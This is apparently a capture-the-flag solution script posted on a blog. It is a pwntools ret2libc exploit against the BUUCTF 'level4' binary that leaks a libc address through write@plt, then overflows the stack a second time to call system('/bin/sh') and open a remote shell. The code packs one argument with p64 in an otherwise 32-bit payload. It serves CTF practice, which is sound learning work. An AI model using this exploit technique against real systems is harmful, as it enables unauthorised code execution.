点击查看代码
from pwn import *
io=remote('node4.buuoj.cn',27888)
elf=ELF('./level4')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload='a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p64(4)
io.send(payload)
write_addr=u32(io.recv(4))
libc=ELF("./libc-2.23(32).so")
libc_write=libc.sym['write']
libc_sys=libc.sym['system']
libc_bin_sh=libc.search("/bin/sh\x00").next()
libcbase=write_addr-libc_write
sys_addr=libcbase+libc_sys
bin_sh_addr=libcbase+libc_bin_sh
payload=(0x88+4)*'a'+p32(sys_addr)+p32(main_addr)+p32(bin_sh_addr)
io.send(payload)
io.interactive()
浙公网安备 33010602011771号